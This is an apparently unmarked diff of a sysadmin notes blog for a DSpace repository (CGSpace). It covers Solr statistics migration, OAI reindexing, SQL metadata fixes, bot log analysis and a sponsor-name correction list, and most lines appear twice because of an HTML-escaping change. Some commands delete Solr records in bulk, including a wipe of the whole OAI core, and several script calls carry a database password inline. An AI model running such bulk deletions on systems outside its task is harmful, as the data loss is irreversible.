$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f &#39;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&#39;
$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
</code></pre><ul>
<li>The processing is very slow and there are lots of errors like this:</li>
</ul>
<pre tabindex="0"><code>Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
<pre tabindex="0"><code>Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -161,8 +161,8 @@ java.lang.NullPointerException
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl http://localhost:8080/solr/oai/update -H &quot;Content-type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;'
$ curl http://localhost:8080/solr/oai/update -H &quot;Content-type: text/xml&quot; --data-binary '&lt;commit /&gt;'
<pre tabindex="0"><code>$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#39;
$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;commit /&gt;&#39;
$ ~/dspace63/bin/dspace oai import
OAI 2.0 manager action started
...
@ -279,7 +279,7 @@ sys 3m13.929s
<li>In theory we can have different languages for metadata fields but in practice we don&rsquo;t do that, so we might as well normalize everything to &ldquo;en_US&rdquo; (and perhaps I should make a curation task to do this)</li>
<li>For now I will do it manually on CGSpace and DSpace Test:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2;
UPDATE 2414738
</code></pre><ul>
<li>Note: DSpace Test doesn&rsquo;t have the <code>resource_type_id</code> column because it&rsquo;s running DSpace 6 and <a href="https://wiki.lyrasis.org/display/DSPACE/DSpace+Service+based+api">the schema changed to use an object model there</a>
@ -288,7 +288,7 @@ UPDATE 2414738
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
</code></pre><ul>
<li>Peter asked if it was possible to find all ILRI items that have &ldquo;zoonoses&rdquo; or &ldquo;zoonotic&rdquo; in their titles and check if they have the ILRI subject &ldquo;ZOONOTIC DISEASES&rdquo; (and add it if not)
<ul>
@ -320,7 +320,7 @@ UPDATE 2414738
</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv &gt; /tmp/ilri.csv
$ csvcut -c &#39;id,cg.subject.ilri[en_US],dc.title[en_US]&#39; ~/Downloads/2020-06-08-ILRI.csv &gt; /tmp/ilri.csv
</code></pre><ul>
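<li>A hypothetical csvgrep follow-up to surface items whose titles mention zoonoses but lack the subject (column names as in the export above):
<pre tabindex="0"><code>$ csvgrep -c &#39;dc.title[en_US]&#39; -r &#39;(?i)zoono&#39; /tmp/ilri.csv | csvgrep -c &#39;cg.subject.ilri[en_US]&#39; -r &#39;ZOONOTIC DISEASES&#39; -i &gt; /tmp/missing-zoonotic.csv
</code></pre></li>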
<li>Moayad asked why he&rsquo;s getting HTTP 500 errors on CGSpace
<ul>
@ -329,7 +329,7 @@ $ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-I
</ul>
</li>
</ul>
<pre tabindex="0"><code># journalctl --since=today -u tomcat7 | grep -c 'Internal Server Error'
<pre tabindex="0"><code># journalctl --since=today -u tomcat7 | grep -c &#39;Internal Server Error&#39;
482
</code></pre><ul>
<li>They are all related to the REST API, like:</li>
@ -366,12 +366,12 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
</code></pre><ul>
<li>Looking back, I see ~800 of these errors since I changed the database configuration last week:</li>
</ul>
<pre tabindex="0"><code># journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
<pre tabindex="0"><code># journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
795
</code></pre><ul>
<li>And only ~280 in the entire month before that&hellip;</li>
</ul>
<pre tabindex="0"><code># journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
<pre tabindex="0"><code># journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
286
</code></pre><ul>
<li>So it seems to be related to the database, perhaps because there are fewer connections in the pool?
@ -394,7 +394,7 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
</code></pre><ul>
<li>Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are in Sweden!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep &#39;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36&#39; | grep -v &#39;/feed&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1624 192.36.136.246
1627 192.36.241.95
1629 192.165.45.204
@ -480,7 +480,7 @@ Total number of bot hits purged: 29025
</ul>
</li>
</ul>
<pre tabindex="0"><code>172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] &quot;GET /rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=0 HTTP/1.1&quot; 403 260 &quot;-&quot; &quot;-&quot;
<pre tabindex="0"><code>172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] &#34;GET /rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=0 HTTP/1.1&#34; 403 260 &#34;-&#34; &#34;-&#34;
</code></pre><ul>
<li>I created an nginx map based on the host&rsquo;s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one
<ul>
@ -497,11 +497,11 @@ Total number of bot hits purged: 29025
</ul>
</li>
</ul>
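<ul>
<li>A minimal sketch of that map (the values here are placeholders, not our production config); the REST API location block then tests <code>$ua</code> instead of <code>$http_user_agent</code>:</li>
</ul>
<pre tabindex="0"><code>map $remote_addr $ua {
    # harvesters that send no user agent get a recognizable one
    172.104.229.92    &#39;AReSHarvesterBot&#39;;
    default           $http_user_agent;
}
</code></pre>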
<pre tabindex="0"><code>$ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq &gt; /tmp/cip-collections.txt
<pre tabindex="0"><code>$ curl -s &#39;https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections&#39; &#39;https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections&#39; | grep -oE &#39;10568/[0-9]+&#39; | sort | uniq &gt; /tmp/cip-collections.txt
</code></pre><ul>
<li>Then I formatted it into a SQL query and exported a CSV:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN (&#39;10568/100533&#39;, &#39;10568/100653&#39;, &#39;10568/101955&#39;, &#39;10568/106580&#39;, &#39;10568/108469&#39;, &#39;10568/51671&#39;, &#39;10568/53085&#39;, &#39;10568/53086&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/53093&#39;, &#39;10568/53094&#39;, &#39;10568/64874&#39;, &#39;10568/69069&#39;, &#39;10568/70150&#39;, &#39;10568/88229&#39;, &#39;10568/89346&#39;, &#39;10568/89347&#39;, &#39;10568/99301&#39;, &#39;10568/99302&#39;, &#39;10568/99303&#39;, &#39;10568/99304&#39;, &#39;10568/99428&#39;))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
COPY 3917
</code></pre><h2 id="2020-06-15">2020-06-15</h2>
<ul>
@ -632,7 +632,7 @@ COPY 3917
</li>
<li>I also notice that there is a <a href="https://www.crossref.org/services/funder-registry/">CrossRef funders registry</a> with 23,000+ funders that you can <a href="https://gitlab.com/crossref/open_funder_registry">download as RDF</a> or <a href="https://www.crossref.org/education/funder-registry/accessing-the-funder-registry/">access via an API</a></li>
</ul>
<pre tabindex="0"><code>$ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&amp;mailto=a.orth@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&amp;mailto=a.orth@cgiar.org&#39;
</code></pre><ul>
<li>Searching for &ldquo;Bill and Melinda Gates&rdquo; we can see the <code>name</code> literal and a list of <code>alt-names</code> literals
<ul>
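<li>For example, a jq sketch to pull those literals out (assuming the response keeps them under <code>message.items</code>):
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&#39; | jq -r &#39;.message.items[] | .name, .&#34;alt-names&#34;[]&#39;
</code></pre></li>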
@ -697,14 +697,14 @@ SUSTAIN
AGRICULTURAL INNOVATIONS
NATIVE VARIETIES
PHYTOPHTHORA INFESTANS
$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -m 127 -d
</code></pre><ul>
<li>She also wants to change their <code>SWEET POTATOES</code> term to <code>SWEETPOTATOES</code>, both in the CIP subject list and existing items so I updated those too:</li>
</ul>
<pre tabindex="0"><code>$ cat /tmp/2020-06-30-fix-cip-subjects.csv
cg.subject.cip,correct
SWEET POTATOES,SWEETPOTATOES
$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -t correct -m 127 -d
</code></pre><ul>
<li>She also finished doing all the corrections to authors that I had sent her last week, but many of the changes remove Spanish accents from authors&rsquo; names, so I asked if she was sure she wanted to do that</li>
<li>I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs</li>
@ -712,63 +712,63 @@ $ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u
</ul>
<pre tabindex="0"><code>$ cat 2020-06-29-fix-sponsors.csv
dc.description.sponsorship,correct
&quot;Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil&quot;,&quot;Conselho Nacional de Desenvolvimento Científico e Tecnológico&quot;
&quot;Claussen Simon Stiftung&quot;,&quot;Claussen-Simon-Stiftung&quot;
&quot;Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium&quot;,&quot;Fonds pour la Formation à la Recherche dans lIndustrie et dans lAgriculture&quot;
&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil&quot;,&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo&quot;
&quot;Schlumberger Foundation Faculty for the Future&quot;,&quot;Schlumberger Foundation&quot;
&quot;Wildlife Conservation Society, United States&quot;,&quot;Wildlife Conservation Society&quot;
&quot;Portuguese Foundation for Science and Technology&quot;,&quot;Portuguese Science and Technology Foundation&quot;
&quot;Wageningen University and Research&quot;,&quot;Wageningen University and Research Centre&quot;
&quot;Leverhulme Centre for Integrative Research in Agriculture and Health&quot;,&quot;Leverhulme Centre for Integrative Research on Agriculture and Health&quot;
&quot;Natural Science and Engineering Research Council of Canada&quot;,&quot;Natural Sciences and Engineering Research Council of Canada&quot;
&quot;Biotechnology and Biological Sciences Research Council, United Kingdom&quot;,&quot;Biotechnology and Biological Sciences Research Council&quot;
&quot;Home Grown Ceraels Authority United Kingdom&quot;,&quot;Home-Grown Cereals Authority&quot;
&quot;Fiat Panis Foundation&quot;,&quot;Foundation fiat panis&quot;
&quot;Defence Science and Technology Laboratory, United Kingdom&quot;,&quot;Defence Science and Technology Laboratory&quot;
&quot;African Development Bank&quot;,&quot;African Development Bank Group&quot;
&quot;Ministry of Health, Labour, and Welfare, Japan&quot;,&quot;Ministry of Health, Labour and Welfare&quot;
&quot;World Academy of Sciences&quot;,&quot;The World Academy of Sciences&quot;
&quot;Agricultural Research Council, South Africa&quot;,&quot;Agricultural Research Council&quot;
&quot;Department of Homeland Security, USA&quot;,&quot;U.S. Department of Homeland Security&quot;
&quot;Quadram Institute&quot;,&quot;Quadram Institute Bioscience&quot;
&quot;Google.org&quot;,&quot;Google&quot;
&quot;Department for Environment, Food and Rural Affairs, United Kingdom&quot;,&quot;Department for Environment, Food and Rural Affairs, UK Government&quot;
&quot;National Commission for Science, Technology and Innovation, Kenya&quot;,&quot;National Commission for Science, Technology and Innovation&quot;
&quot;Hainan Province Natural Science Foundation of China&quot;,&quot;Natural Science Foundation of Hainan Province&quot;
&quot;German Society for International Cooperation (GIZ)&quot;,&quot;GIZ&quot;
&quot;German Federal Ministry of Food and Agriculture&quot;,&quot;Federal Ministry of Food and Agriculture&quot;
&quot;State Key Laboratory of Environmental Geochemistry, China&quot;,&quot;State Key Laboratory of Environmental Geochemistry&quot;
&quot;QUT student scholarship&quot;,&quot;Queensland University of Technology&quot;
&quot;Australia Centre for International Agricultural Research&quot;,&quot;Australian Centre for International Agricultural Research&quot;
&quot;Belgian Science Policy&quot;,&quot;Belgian Federal Science Policy Office&quot;
&quot;U.S. Department of Agriculture USDA&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;U.S.. Department of Agriculture (USDA)&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)&quot;,&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo&quot;
&quot;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil&quot;,&quot;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul&quot;
&quot;Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil&quot;,&quot;Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro&quot;
&quot;Swedish University of Agricultural Sciences (SLU)&quot;,&quot;Swedish University of Agricultural Sciences&quot;
&quot;U.S. Department of Agriculture (USDA)&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;Swedish International Development Cooperation Agency (Sida)&quot;,&quot;Sida&quot;
&quot;Swedish International Development Agency&quot;,&quot;Sida&quot;
&quot;Federal Ministry for Economic Cooperation and Development, Germany&quot;,&quot;Federal Ministry for Economic Cooperation and Development&quot;
&quot;Natural Environment Research Council, United Kingdom&quot;,&quot;Natural Environment Research Council&quot;
&quot;Economic and Social Research Council, United Kingdom&quot;,&quot;Economic and Social Research Council&quot;
&quot;Medical Research Council, United Kingdom&quot;,&quot;Medical Research Council&quot;
&quot;Federal Ministry for Education and Research, Germany&quot;,&quot;Federal Ministry for Education, Science, Research and Technology&quot;
&quot;UK Governments Department for International Development&quot;,&quot;Department for International Development, UK Government&quot;
&quot;Department for International Development, United Kingdom&quot;,&quot;Department for International Development, UK Government&quot;
&quot;United Nations Children's Fund&quot;,&quot;United Nations Children's Emergency Fund&quot;
&quot;Swedish Research Council for Environment, Agricultural Science and Spatial Planning&quot;,&quot;Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning&quot;
&quot;Agence Nationale de la Recherche, France&quot;,&quot;French National Research Agency&quot;
&quot;Fondation pour la recherche sur la biodiversité&quot;,&quot;Foundation for Research on Biodiversity&quot;
&quot;Programa Nacional de Innovacion Agraria, Peru&quot;,&quot;Programa Nacional de Innovación Agraria, Peru&quot;
&quot;United States Agency for International Development (USAID)&quot;,&quot;United States Agency for International Development&quot;
&quot;West Africa Agricultural Productivity Programme&quot;,&quot;West Africa Agricultural Productivity Program&quot;
&quot;West African Agricultural Productivity Project&quot;,&quot;West Africa Agricultural Productivity Program&quot;
&quot;Rural Development Administration, Republic of Korea&quot;,&quot;Rural Development Administration&quot;
&quot;UKs Biotechnology and Biological Sciences Research Council (BBSRC)&quot;,&quot;Biotechnology and Biological Sciences Research Council&quot;
$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil&#34;,&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico&#34;
&#34;Claussen Simon Stiftung&#34;,&#34;Claussen-Simon-Stiftung&#34;
&#34;Fonds pour la formation á la Recherche dans l&#39;Industrie et dans l&#39;Agriculture, Belgium&#34;,&#34;Fonds pour la Formation à la Recherche dans lIndustrie et dans lAgriculture&#34;
&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
&#34;Schlumberger Foundation Faculty for the Future&#34;,&#34;Schlumberger Foundation&#34;
&#34;Wildlife Conservation Society, United States&#34;,&#34;Wildlife Conservation Society&#34;
&#34;Portuguese Foundation for Science and Technology&#34;,&#34;Portuguese Science and Technology Foundation&#34;
&#34;Wageningen University and Research&#34;,&#34;Wageningen University and Research Centre&#34;
&#34;Leverhulme Centre for Integrative Research in Agriculture and Health&#34;,&#34;Leverhulme Centre for Integrative Research on Agriculture and Health&#34;
&#34;Natural Science and Engineering Research Council of Canada&#34;,&#34;Natural Sciences and Engineering Research Council of Canada&#34;
&#34;Biotechnology and Biological Sciences Research Council, United Kingdom&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
&#34;Home Grown Ceraels Authority United Kingdom&#34;,&#34;Home-Grown Cereals Authority&#34;
&#34;Fiat Panis Foundation&#34;,&#34;Foundation fiat panis&#34;
&#34;Defence Science and Technology Laboratory, United Kingdom&#34;,&#34;Defence Science and Technology Laboratory&#34;
&#34;African Development Bank&#34;,&#34;African Development Bank Group&#34;
&#34;Ministry of Health, Labour, and Welfare, Japan&#34;,&#34;Ministry of Health, Labour and Welfare&#34;
&#34;World Academy of Sciences&#34;,&#34;The World Academy of Sciences&#34;
&#34;Agricultural Research Council, South Africa&#34;,&#34;Agricultural Research Council&#34;
&#34;Department of Homeland Security, USA&#34;,&#34;U.S. Department of Homeland Security&#34;
&#34;Quadram Institute&#34;,&#34;Quadram Institute Bioscience&#34;
&#34;Google.org&#34;,&#34;Google&#34;
&#34;Department for Environment, Food and Rural Affairs, United Kingdom&#34;,&#34;Department for Environment, Food and Rural Affairs, UK Government&#34;
&#34;National Commission for Science, Technology and Innovation, Kenya&#34;,&#34;National Commission for Science, Technology and Innovation&#34;
&#34;Hainan Province Natural Science Foundation of China&#34;,&#34;Natural Science Foundation of Hainan Province&#34;
&#34;German Society for International Cooperation (GIZ)&#34;,&#34;GIZ&#34;
&#34;German Federal Ministry of Food and Agriculture&#34;,&#34;Federal Ministry of Food and Agriculture&#34;
&#34;State Key Laboratory of Environmental Geochemistry, China&#34;,&#34;State Key Laboratory of Environmental Geochemistry&#34;
&#34;QUT student scholarship&#34;,&#34;Queensland University of Technology&#34;
&#34;Australia Centre for International Agricultural Research&#34;,&#34;Australian Centre for International Agricultural Research&#34;
&#34;Belgian Science Policy&#34;,&#34;Belgian Federal Science Policy Office&#34;
&#34;U.S. Department of Agriculture USDA&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;U.S.. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul&#34;
&#34;Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil&#34;,&#34;Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro&#34;
&#34;Swedish University of Agricultural Sciences (SLU)&#34;,&#34;Swedish University of Agricultural Sciences&#34;
&#34;U.S. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;Swedish International Development Cooperation Agency (Sida)&#34;,&#34;Sida&#34;
&#34;Swedish International Development Agency&#34;,&#34;Sida&#34;
&#34;Federal Ministry for Economic Cooperation and Development, Germany&#34;,&#34;Federal Ministry for Economic Cooperation and Development&#34;
&#34;Natural Environment Research Council, United Kingdom&#34;,&#34;Natural Environment Research Council&#34;
&#34;Economic and Social Research Council, United Kingdom&#34;,&#34;Economic and Social Research Council&#34;
&#34;Medical Research Council, United Kingdom&#34;,&#34;Medical Research Council&#34;
&#34;Federal Ministry for Education and Research, Germany&#34;,&#34;Federal Ministry for Education, Science, Research and Technology&#34;
&#34;UK Governments Department for International Development&#34;,&#34;Department for International Development, UK Government&#34;
&#34;Department for International Development, United Kingdom&#34;,&#34;Department for International Development, UK Government&#34;
&#34;United Nations Children&#39;s Fund&#34;,&#34;United Nations Children&#39;s Emergency Fund&#34;
&#34;Swedish Research Council for Environment, Agricultural Science and Spatial Planning&#34;,&#34;Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning&#34;
&#34;Agence Nationale de la Recherche, France&#34;,&#34;French National Research Agency&#34;
&#34;Fondation pour la recherche sur la biodiversité&#34;,&#34;Foundation for Research on Biodiversity&#34;
&#34;Programa Nacional de Innovacion Agraria, Peru&#34;,&#34;Programa Nacional de Innovación Agraria, Peru&#34;
&#34;United States Agency for International Development (USAID)&#34;,&#34;United States Agency for International Development&#34;
&#34;West Africa Agricultural Productivity Programme&#34;,&#34;West Africa Agricultural Productivity Program&#34;
&#34;West African Agricultural Productivity Project&#34;,&#34;West Africa Agricultural Productivity Program&#34;
&#34;Rural Development Administration, Republic of Korea&#34;,&#34;Rural Development Administration&#34;
&#34;UKs Biotechnology and Biological Sciences Research Council (BBSRC)&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
</code></pre><ul>
<li>Then I started a full re-index at batch CPU priority:</li>
</ul>
@ -784,9 +784,9 @@ sys 2m56.635s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ dspace metadata-export -i 10568/1 -f /tmp/ilri.csv
$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv &gt; /tmp/ilri-covid19.csv
$ csvcut -c &#39;id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]&#39; /tmp/ilri.csv &gt; /tmp/ilri-covid19.csv
</code></pre><ul>
<li>I see that all items with &ldquo;COVID19&rdquo; already have &ldquo;CORONAVIRUS DISEASE&rdquo; so I don&rsquo;t need to do anything</li>
</ul>
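<ul>
<li>A csvgrep check along these lines would confirm it (column names from the export above; zero rows means nothing to fix):</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c &#39;dc.subject[en_US]&#39; -r &#39;COVID19&#39; /tmp/ilri-covid19.csv | csvgrep -c &#39;cg.subject.ilri[en_US]&#39; -r &#39;CORONAVIRUS DISEASE&#39; -i | csvstat --count
</code></pre>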
@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone
Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -139,7 +139,7 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
<li>Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning</li>
<li>First looking at the traffic in the morning:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E &quot;01/Jul/2020:(00|01|02|03|04)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E &#34;01/Jul/2020:(00|01|02|03|04)&#34; | goaccess --log-format=COMBINED -
...
9659 33.56% 1 0.08% 340.94 MiB 64.39.99.13
3317 11.53% 1 0.08% 871.71 MiB 199.47.87.140
@ -153,8 +153,8 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
<li>I will purge hits from that IP from Solr</li>
<li>The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:/Turnitin.*/&amp;rows=0&quot; | grep -oE 'numFound=&quot;[0-9]+&quot;'
numFound=&quot;41694&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Turnitin.*/&amp;rows=0&#34; | grep -oE &#39;numFound=&#34;[0-9]+&#34;&#39;
numFound=&#34;41694&#34;
</code></pre><ul>
<li>They used to be &ldquo;TurnitinBot&rdquo;&hellip; hhmmmm, seems they use both: <a href="https://turnitin.com/robot/crawlerinfo.html">https://turnitin.com/robot/crawlerinfo.html</a></li>
<li>I will add Turnitin to the DSpace bot user agent list, but I see they are requesting <code>robots.txt</code> and only requesting item pages, so that&rsquo;s impressive! I don&rsquo;t need to add them to the &ldquo;bad bot&rdquo; rate limit list in nginx</li>
